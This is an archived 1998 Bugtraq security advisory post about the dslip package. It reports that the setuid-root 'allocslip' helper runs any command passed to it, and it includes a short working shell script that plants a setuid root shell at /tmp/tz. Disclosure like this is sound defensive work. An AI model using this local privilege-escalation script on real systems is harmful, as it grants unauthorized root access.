Bugtraq mailing list archives
dslip package
From: taz () SIMPLENET COM (David Kopstain)
Date: Thu, 9 Jul 1998 01:34:20 -0700
In the README file for the dslip package, it clearly states: Those people who are allowed to turn on and off SLIP lines should be put in the slip group. NOBODY except user slip should be allowed in the slipown group since it effectively allows root access (since the dialin/dialout scripts must be run as root). The package advises to install the program 'allocslip' like so: -rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip* If you follow the instructions, then only users in group slipown can run this program and you're only at _their_ mercy. But if you allow anyone to run this program on your machine, and its setuid root like advised, then something as easy as this will compromise root. --- cut --- #!/bin/sh cat > /tmp/sg << EOF #!/bin/sh cp /bin/sh /tmp/tz chown root /tmp/tz chmod 4755 /tmp/tz EOF chmod +x /tmp/sg allocslip /tmp/sg --- eof --- allocslip simply follows any command you give it as arg 1. So take the above shell script, run it, then look for your handy root shell at /tmp/tz. The buffer overflow previously mentioned is of no real concern then since we can already execute whatever we want. And the reason some people can't make this program do what exactly what they want, (ie call system_script() so they can execute whatever they want), is because they must have compiled in the slip option in the networking options of the kernel. Moral of the story: read the manual. dont be a dumbshit and install software without reading exactly what you're doing. -taz
Current thread:
- SmurfLog 1.0 Bug Lord (Jul 03)
- Linux kernel filesystem oddities Michal Zalewski (Jul 05)
- sentry Paul Boehm (Jul 08)
- Re: Linux kernel filesystem oddities Pavel Kankovsky (Jul 08)
- Re: Linux kernel filesystem oddities Michal Zalewski (Jul 06)
- Re: Linux kernel filesystem oddities Pavel Kankovsky (Jul 08)
- Re: Linux kernel filesystem oddities Jeffrey Hutzelman (Jul 09)
- dslip package David Kopstain (Jul 09)
- SLMail 3.0.2421 Stack Overflow... Aleph One (Jul 09)
- Linux kernel filesystem oddities Michal Zalewski (Jul 05)
- Re: SmurfLog 1.0 Bug Lord (Jul 10)
- Re: port 0 scanning Lamont Granquist (Jul 09)
- Regarding Mudge's OBP/FORTH root hack (PHRACK53) Jericho Nunn (Jul 10)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) John W. Temples (Jul 11)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Casper Dik (Jul 13)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Gene Spafford (Jul 11)
- Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53) Mike Scher (Jul 11)